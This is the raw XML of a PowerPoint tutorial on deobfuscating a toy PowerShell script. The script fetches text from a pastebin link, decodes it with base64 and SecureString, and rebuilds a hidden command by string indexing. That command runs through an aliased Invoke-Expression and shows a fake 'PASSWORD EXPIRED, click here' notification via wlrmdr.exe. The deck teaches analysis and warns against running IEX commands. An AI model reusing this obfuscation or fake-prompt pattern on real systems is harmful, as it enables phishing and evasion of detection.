                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34F585F6-A407-4F59-9FDD-246304393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6706" y="945453"/>
            <a:ext cx="3411893" cy="2268991"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 5" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6540CFE-041C-4825-9D24-38C6E4739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" y="4303426"/>
            <a:ext cx="12133729" cy="39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7877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is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NetworkCredential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doing?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NetworkCredential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() creates a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NetworkCredential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Object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NetworkCredential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Object provides credentials for password-based authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="361950" marR="0" lvl="2" indent="-1841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12ABDB"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="•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This object has a property called "Username", which is the username you would authentication with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object also has a property called "Password", which we can give it a String or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SecureString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. But on the backend, it will store it as a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SecureString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50403060203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Can you figure out how we decode the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SecureString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with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NetworkCredential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?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lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://learn.microsoft.com/en-us/dotnet/api/system.net.networkcredential.-ctor?view=net-6.0#system-net-networkcredential-ctor(system-string-system-security-securestring)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Ubuntu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SecureString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is more base64 data and needs to be decoded. You have already learned how to do it. So give it a go.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02611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(butterfly)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126776" y="1447800"/>
            <a:ext cx="9962259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Putting it all together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learned that butterfly() pulls the webpage contents from a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pastebin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link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contents of that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pastebin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link are fed into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ConvertTo-SecureString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System.Net.NetworkCredential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is used to decode our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SecureString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Our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SecureString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is more base64 data, which decoding that we get a long string about a happy pony!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lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Ubuntu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lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Ubuntu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604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Let’s simplify the code with what we know now.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lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Ubuntu"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="361950" marR="0" lvl="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7" name="Picture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CC675DA-9C89-4806-8282-CAE4EDB0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29" y="3042570"/>
            <a:ext cx="11618258" cy="1072719"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9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0CAEFAF9-C9B5-4F8D-955C-F2756B899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48689"/>
            <a:ext cx="11924553" cy="8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44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(pony)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0980CE37-0013-4E5B-A7CA-C88578FE7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635" y="1351830"/>
            <a:ext cx="10243670" cy="473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753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(pony)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D73D9C9B-6192-41D8-9706-529663056350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fourth function, is "pony"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 notice that "pony" doesn't take an input, but does return something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other thing that I notice right off the bat, is that we have array indexing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can tell that we have array indexing because we have a variable followed by a set of square-brackets with a number inside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pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2155F5C7-FCB2-4E74-B195-09593E287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988" y="3480948"/>
            <a:ext cx="6672729" cy="308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5470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(pony)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640B795C-29BB-457D-8B75-E33FF58811DB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code we have does indexing over a string!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Let's break this down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11" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AF9958E-86DC-4805-97B8-088CB8AB4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812" y="2554595"/>
            <a:ext cx="8107082" cy="375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04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(pony)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48DE73D-9766-40C9-A11C-C7B951B99E53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you remember, "butterfly" returned that long string, "I am a little - 4 year old pony - that dreams of being a unicorn. I want to play and romp around in the sky for like 10x a day. I want to ride rainbows and shoot butterflies out of my horn!"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We're assigning that to "$trot", so "$trot" is now a copy of that long string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do string indexing on $trot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Remember notice the square-brackets!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Let's walkthrough the first line together, and we'll update the rest of the code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8" name="Picture 5" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E87F4334-972C-46F1-BFAA-E5A537CEF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12" y="3237211"/>
            <a:ext cx="11737787" cy="6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695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(pony)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94CE442E-F4AC-4C5E-AB06-5CE6FDDFBFB2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translated $trot[68], we would get a "w"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translated $trot[7], we would get a "l"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translated $trot[21], we would get a "r"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keep going, we get "wlrmdr.exe"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7C3B240D-5DC0-4125-87A1-164CC8603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77" y="1018447"/>
            <a:ext cx="11618258" cy="6898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90EF2D-AE8B-465D-97FF-40EE6C238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36" y="2201703"/>
            <a:ext cx="5148729" cy="4524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4E1D8F-7069-4CA5-9E7A-1E775124C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635" y="3237063"/>
            <a:ext cx="5148729" cy="5258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858BA91-3AC3-4690-848D-2AE4D7CF8B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635" y="4357385"/>
            <a:ext cx="5148729" cy="47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183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(pony)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C9419457-056E-48C8-8221-5274D799EA80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And if we keep substituting things in, we can simplify our code to:  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5996EB46-0757-4141-8A75-22D23C6AE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825737"/>
            <a:ext cx="9384552" cy="454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415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622926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TL;DR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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965306-C79A-4384-A7B6-39466E83A5EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2114145" y="2151224"/>
            <a:ext cx="6096000" cy="1892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pony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C678DD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Fira Code" panose="020B0809050000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function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unicorn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{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$little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pony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$fly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''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C678DD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Fira Code" panose="020B0809050000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Foreach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(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$sky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C678DD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$little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) {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$fly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+=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$sky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}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900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C678DD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Fira Code" panose="020B0809050000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return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Fira Code" panose="020B0809050000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$fly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}</a:t>
            </a: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unicorn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</a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Fira Code" panose="020B0809050000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Invoke-Expression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF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900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Fira Code" panose="020B0809050000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"wlrmdr.exe -s 10000 -f 1 -t PASSWORD EXPIRED  -m Click here to change now.  -a  10 -u https://acegif.com/wp-content/gif/unicorn-80.gif"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="ABB2BF"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin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7157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(pony)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462382A-F4E6-48CF-ABB7-094C0440B240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simplified return statement from pony would be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We're almost done, we can see the command pretty much built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,Sans-Serif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Putting it all together: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Wingdings,Sans-Serif" panose="05000000000000000000" pitchFamily="2" charset="2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used string-indexing to construct our command from a completely different string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Wingdings,Sans-Serif" panose="05000000000000000000" pitchFamily="2" charset="2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Wingdings,Sans-Serif" panose="05000000000000000000" pitchFamily="2" charset="2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Returned the command that we will likely be calling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A3F0A2CA-68F8-473B-8C1A-68763D93F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59" y="1990720"/>
            <a:ext cx="11401611" cy="426208"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BBB40C9-3D37-4290-8CC8-5C0955AAE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635" y="3323032"/>
            <a:ext cx="10482729" cy="1085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6506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(unicorn)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70EEE94-10D2-492E-943E-7175099FF717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5646364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 see a few things in unicorn function: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"pony" is being reassigned to "$little". This means we're taking the output of the pony function and putting that in the variable "$little"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"foreach" loop running over "$little"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We'll dissect what happens here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$fly was initialized as an empty string, turns out we end up returning it $fly. This tells me we're going to use $fly to build our final command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8" name="Picture 4" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E8E43FE-295A-4650-84CD-8EBACAC7D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948" y="1826248"/>
            <a:ext cx="5828552" cy="320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5172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(unicorn)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2F7F3EBC-6859-4908-9D2E-CDC633ECF93F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5646364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Let's talk foreach-loops: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foreach loop is a special type of "for-loop", where we iterate over each element in the array without needing to know the size ahead of time.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"foreach" loop example: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Foreach (element in array) {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// do something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}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So, this is going to step through each item from pony, one item at a time.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10" name="Picture 4" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F9D06D1-576F-489A-8BA3-090959D71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753" y="2136278"/>
            <a:ext cx="5828552" cy="320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2278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(unicorn)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70EEE94-10D2-492E-943E-7175099FF717}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404812" y="1447800"/>
            <a:ext cx="5684519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 see a few things in unicorn function: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"pony" is being reassigned to "$little". This means we're taking the output of the pony function and putting that in the variable "$little"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"foreach" loop running over "$little"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We'll dissect what happens here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36195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$fly was initialized as an empty string, turns out we end up returning it $fly. This tells me we're going to use $fly to build our final command which will be a string of $little concatenated together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8" name="Picture 4" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E8E43FE-295A-4650-84CD-8EBACAC7D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948" y="1724416"/>
            <a:ext cx="5828552" cy="2933129"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 5" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB4F71AA-48D3-4357-ADDB-FA24E3F05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46" y="4886939"/>
            <a:ext cx="10004611" cy="174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755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What do the functions do? (unicorn)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7EA8E929-B3AF-46F6-9318-9DEEE20624BC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0950481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After we finish concatenating (combining) all the Strings together, we end up with the final command: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361950" marR="0" lvl="2" indent="-1841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12ABDB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Putting it all together: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take in the array from "pony" of our disjointed command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Returns the fully assembled command, ready to be run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825A9016-7993-4EBD-A4A7-B6693C77A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06" y="2031425"/>
            <a:ext cx="11476317" cy="87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2007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Program flow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FC46642B-BC44-4B0C-814A-06FAAEDE82D1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0950481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you recall earlier, we can't call these functions by themselves, usually code outside of these functions help control the "main" program flow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have to look at the last two piece of our code to figure out how this whole thing is run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When we look at code outside the functions, we resolve them top-to-bottom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87461D7E-B413-45D9-ADFF-1B3490FE9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82" y="3133148"/>
            <a:ext cx="10549964" cy="331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981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Program flow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21623DAA-DB07-465F-93A4-6CDBF9A38214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0950481" cy="4951413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="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does "set-alias" do?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look this up on the Microsoft docs page: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set-alias creates or changes an alias for a commandlet or other command in PowerShell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So, this code is essentially giving a command a nickname to have another name to call it by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new nickname we're giving it comes after "-Name"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"i-am-sprinkles-the"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original command comes after "-Value"</a:t>
            </a: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"IeX"</a:t>
            </a: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IeX now has a new nickname we can use called "i-am-sprinkles-the"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96C6EA0D-97BC-41D8-9809-5CE89DCB9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518" y="3096920"/>
            <a:ext cx="7621494" cy="83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331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Program flow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D64A14C-5D1A-44D5-8EAE-CBB972C073E5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0950481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saw that "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-am-sprinkles-the" was an alias (or nickname) for "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IeX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5000000000000000000" pitchFamily="2" charset="2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already learned is a way to execute commands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So, if we substitute in "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IeX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" for "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-am-sprinkles-the" and what we got back from "unicorn"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5000000000000000000" pitchFamily="2" charset="2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We can see this will run the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deobfuscated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final command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Again, DO NOT RUN COMMANDS INSIDE OF IEX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5000000000000000000" pitchFamily="2" charset="2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This example is safe, but in the real world could potentially result in downloading malware or executing malicious code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5000000000000000000" pitchFamily="2" charset="2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92642F30-C334-47F0-9665-E2CEF71B6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456" y="2170206"/>
            <a:ext cx="4613088" cy="709705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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7E950E02-E13E-45A0-A1ED-88FCEAD51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2" y="3837290"/>
            <a:ext cx="12111317" cy="40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089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Program flow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EFBBF157-7A27-45B8-B260-94041E600684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6811775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In this statement, we make a call to the function "unicorn"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Once, we're inside of the "unicorn" function, the first thing we see is a function call to "pony“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Once, we're inside the "pony" function, the first thing we see is a call to "butterfly"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This is one example, but we see this happen throughout the code. Inside of "butterfly" we call "rainbow" to base64 decode a blob of text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9A236D19-78E1-490B-8FFD-017E2F529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9796" y="1447800"/>
            <a:ext cx="4021230" cy="604370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 7" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE32FDDE-73B1-4007-BAD0-13CCC629B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796" y="2053014"/>
            <a:ext cx="3808319" cy="1092947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E67EF1A2-4AD2-4222-801E-D64C9A083A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9816" y="3145961"/>
            <a:ext cx="3412751" cy="893295"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 7" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BE6D59E-7575-466E-B8A2-09EA3B91FA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6588" y="4039256"/>
            <a:ext cx="4657492" cy="82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9455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cap="all" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="12ACDC"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu Medium"/>
              </a:rPr>
              <a:t>What does the script do?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12EF6448-0815-453B-AB59-D36499F013ED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bg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If we were to run this, we get the following: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is "wlrmdr.exe"?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happens when we pass it "-a 11" instead of "-a 10"?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pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEC907DB-4264-4F70-9B3D-91C1FBC94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671"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1884810" y="3101971"/>
            <a:ext cx="3596379" cy="1485019"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15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E2CCFAAC-30E7-4AEB-A2B2-4E526D4B2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224" y="1482165"/>
            <a:ext cx="38862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056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A3E22E6-1856-4CAE-93A4-2634BA541A43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="922635" y="1250575"/>
            <a:ext cx="4604274" cy="4163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GB" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="12ACDC"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Inspect Code</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="6000" b="1" dirty="0">
              <a:latin typeface="Ubuntu" panose="020B050403060203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FE3579-415C-4574-BAF7-1CB9490E6AD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6293224" y="860612"/>
            <a:ext cx="4797909" cy="5023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50,000-foot glance.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3560810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622926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Variables, Functions, objects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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D9301A-71EF-4D4C-8D26-AE850008B689}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404813" y="1447800"/>
            <a:ext cx="11406187" cy="495141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490CA-D20F-411A-B8BD-77671C4707B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1976822" y="1863738"/>
            <a:ext cx="10327857" cy="2846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is the purpose of this step? Why are we stopping to inspect things?</a:t>
            </a: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5000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§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Take stock of what the code is doing at a high-level</a:t>
            </a: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5000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§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5000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§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Find interesting things of note that we can look into</a:t>
            </a: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5000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§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5000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§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Glean a rough program flow</a:t>
            </a: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5000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§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635000" lvl="2" indent="-177800">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0070AD"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§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Use the things we find as a checklist of things to go through</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2491820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12ACDC"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Functions &amp; methods</a:t>
            </a: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D7C51007-9536-4F6D-94D9-F94FB3B75810}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="77822" y="1215515"/>
            <a:ext cx="4721290" cy="5255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is a function?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block of code that can take in data, process it, and optionally return information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Functions will generally have a specific purpose to them</a:t>
            </a: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for example, you might have a function that takes in a number and returns true if it is a prime number or false if it is not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604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–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Functions have to be called, they don't run by themselves</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="361950" marR="0" lvl="2" indent="-1841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12ABDB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Example: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function butterfly{...}</a:t>
            </a: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is a method?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block of code that can take in data, process it, and optionally return information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Methods are functions for classes (Class objects)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Example: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[</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US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System.Convert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]::FromBase64String()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Courier New"/>
              </a:rPr>
              <a:t>Another example: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New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US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System.Net.NetworkCredential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()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 6" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F12B189-F26C-4400-A508-0B2A2F959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505" y="1074420"/>
            <a:ext cx="7392889" cy="539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981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12ACDC"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Modules</a:t>
            </a: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D7C51007-9536-4F6D-94D9-F94FB3B75810}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="408086" y="1215515"/>
            <a:ext cx="4391025" cy="44269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These are .NET and PowerShell specific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207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is a module?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PowerShell cmdlet, function, or alias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They'll generally appear as two words separated by a hyphen ("-")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20B0504030602030204" pitchFamily="34" charset="0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are some examples?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Set-Alias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Select-Object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New-Object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ConvertTo-SecureString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pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 6" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F12B189-F26C-4400-A508-0B2A2F959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505" y="1074420"/>
            <a:ext cx="7392889" cy="539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11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6A2E019-59ED-4449-8EA1-7D47BA9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5793"/>
            <a:ext cx="5684519" cy="748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rgbClr val="12ACDC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Ubuntu Medium"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>variables</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="12ACDC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D7C51007-9536-4F6D-94D9-F94FB3B75810}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="64852" y="1215515"/>
            <a:ext cx="4734260" cy="525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are variables?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A place to temporarily store information</a:t>
            </a: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177800" marR="0" lvl="1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70A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What do variables look like?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You can recognize a variable by the usage of a single equals sign ("=")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variable is on the left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50403060203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data put into the variable is on the right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539750" marR="0" lvl="3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F878A"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Ubuntu" panose="020B0504030602030204" pitchFamily="34" charset="0"/>
              <a:buChar char="–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Examples: In PowerShell, C# they start with a dollar sign  ("$")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$glitter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  <a:p>
            <a:pPr marL="717550" marR="0" lvl="4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$breeze</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 6" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F12B189-F26C-4400-A508-0B2A2F959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505" y="1074420"/>
            <a:ext cx="7392889" cy="539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98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3560</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>461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60" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Fira Code</vt:lpstr>
      <vt:lpstr>Ubuntu</vt:lpstr>
      <vt:lpstr>Ubuntu Medium</vt:lpstr>
      <vt:lpstr>Ubuntu,Sans-Serif</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings,Sans-Serif</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>TL;DR</vt:lpstr>
      <vt:lpstr>TL;DR</vt:lpstr>
      <vt:lpstr>TL;DR</vt:lpstr>
      <vt:lpstr>TL;DR</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Variables, Functions, objects</vt:lpstr>
      <vt:lpstr>Functions &amp; methods</vt:lpstr>
      <vt:lpstr>Modules</vt:lpstr>
      <vt:lpstr>variables</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Divide and Conquer</vt:lpstr>
      <vt:lpstr>Divide and conquer</vt:lpstr>
      <vt:lpstr>Divide and Conquer</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>What do the functions do? (rainbow)</vt:lpstr>
      <vt:lpstr>What do the functions do? (rainbow)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What do the functions do? (butterfly)</vt:lpstr>
      <vt:lpstr>Updating our hypothesis</vt:lpstr>
      <vt:lpstr>What do the functions do? (butterfly)</vt:lpstr>
      <vt:lpstr>What do the functions do? (butterfly)</vt:lpstr>
      <vt:lpstr>What do the functions do? (butterfly)</vt:lpstr>
      <vt:lpstr>What do the functions do? (pony)</vt:lpstr>
      <vt:lpstr>What do the functions do? (pony)</vt:lpstr>
      <vt:lpstr>What do the functions do? (pony)</vt:lpstr>
      <vt:lpstr>What do the functions do? (pony)</vt:lpstr>
      <vt:lpstr>What do the functions do? (pony)</vt:lpstr>
      <vt:lpstr>What do the functions do? (pony)</vt:lpstr>
      <vt:lpstr>What do the functions do? (pony)</vt:lpstr>
      <vt:lpstr>What do the functions do? (unicorn)</vt:lpstr>
      <vt:lpstr>What do the functions do? (unicorn)</vt:lpstr>
      <vt:lpstr>What do the functions do? (unicorn)</vt:lpstr>
      <vt:lpstr>What do the functions do? (unicorn)</vt:lpstr>
      <vt:lpstr>Program flow</vt:lpstr>
      <vt:lpstr>Program flow</vt:lpstr>
      <vt:lpstr>Program flow</vt:lpstr>
      <vt:lpstr>Program flow</vt:lpstr>
      <vt:lpstr>What does the script do?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Trevor Miller</dc:creator>
  <cp:lastModifiedBy>Trevor Miller</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-01-13T18:10:35Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-27T21:32:38Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/thumbnail.jpeg>
</file>